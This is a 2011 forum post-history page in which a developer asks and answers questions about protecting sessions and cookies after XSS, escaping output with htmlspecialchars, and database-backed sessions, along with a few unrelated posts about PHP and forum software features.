Show Posts
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Messages - Dragooon
766
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 02:24 AM »
Yes, it was one of my more useless posts. I'm burned out, haven't slept in all night.
767
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 02:16 AM »
Really. Really. htmlspecialchars.
768
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 02:05 AM »
Ah so that's what the salt is for, didn't know that. Thanks :).Quote Well that's true, and it's quite saddening knowing that there are ways to get around all this.
Let's be honest for a moment: the entire nature of cookies is a workaround for the fact that you want to represent some semblance of state over a protocol designed to be stateless.
769
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 01:53 AM »
Ah yeah. I didn't think of that. Plus HTTP security has a few issues and holes of its own. Since mine is a custom made project and it contains a lot of sensitive information, I am very paranoid of security. Features be damned if a single security issue arises. Although since at the moment data can only be entered through our staff, XSS isn't a possibility but we will be opening it to the public
Oh, and in SMF's case, if an user got somebody's cookie he or she can basically access his or her account since passwords can be sent pre-SHA1'd.
So far here are a few things I've thought of
- IP checking (Can't find a way around it)
- Small cookie time length
- Database check for cookie time length(All the whole time thing can be poofed).
- Storing a token instead of password in the cookie
Oh, and in SMF's case, if an user got somebody's cookie he or she can basically access his or her account since passwords can be sent pre-SHA1'd.
So far here are a few things I've thought of
- IP checking (Can't find a way around it)
- Small cookie time length
- Database check for cookie time length(All the whole time thing can be poofed).
- Storing a token instead of password in the cookie
770
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 01:38 AM »Last question first. Database driven sessions help in shared host cases. By having them in your database tables, as opposed to a system-wide temporary folder, the odds of session poisoning or simple overwriting by accident are basically nil.
That won't prevent you if you have URLs with the session in them, which can be scraped and are accessible to the current scripting context.
771
Off-topic / Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 12:45 AM »
I've been running post-xss scenarios and the obvious one is cookie stealing(Perhaps the only use of XSS) and after a cookie is stolen. The common protection is using sessions and I've not been doing that, although can't that too be stolen since it has to be tracked via cookie? So is there a way to protect against a post-cookie stealing scenario?
Also, how do database driven sessions help?
Also, how do database driven sessions help?
772
Off-topic / Re: htmlspecialchars while inserting into DB
« on June 21st, 2011, 12:37 AM »
Thanks, I am using tox-g which explicitly uses htmlspecialchars in outputs, although I guess one can't be too secure.
773
Off-topic / Re: htmlspecialchars while inserting into DB
« on June 20th, 2011, 10:39 PM »
But do you htmlspecialchar them while inserting or while outputting? And does prepared statement automatically take care of escaping and security?
774
Off-topic / htmlspecialchars while inserting into DB
« on June 20th, 2011, 09:59 PM »
Does this make sense? I've been wondering, wouldn't mysql_real_escape be enough while appending to DB?
775
FAQs / [FAQ] Re: Minimum requirements
« on June 19th, 2011, 08:51 PM »
Mhmm....game...fancy shadows.......Crysis!
Although I agree, Flash being a requirement is ridiculous even when the general shift is against it. It being recommended is totally reasonable though.
Although I agree, Flash being a requirement is ridiculous even when the general shift is against it. It being recommended is totally reasonable though.
776
FAQs / [FAQ] Re: Minimum requirements
« on June 19th, 2011, 07:07 PM »
That is only for mass upload, and that can be replaced with the newer JavaScript File API since it supports upload progress.
778
Features: Theming / Re: Template blocks
« on June 19th, 2011, 12:42 PM »
Actually AFAIK it is using a far simpler concept, basically search and replace at session rewrite based on defined patterns in template_init.
780
Off-topic / Re: A PHP fork?
« on June 16th, 2011, 09:56 PM »
I use $_REQUEST all the time :P.
Its nice PHP fork with a few nifty feature but I don't see myself switching it or giving it a shot honestly.
Its nice PHP fork with a few nifty feature but I don't see myself switching it or giving it a shot honestly.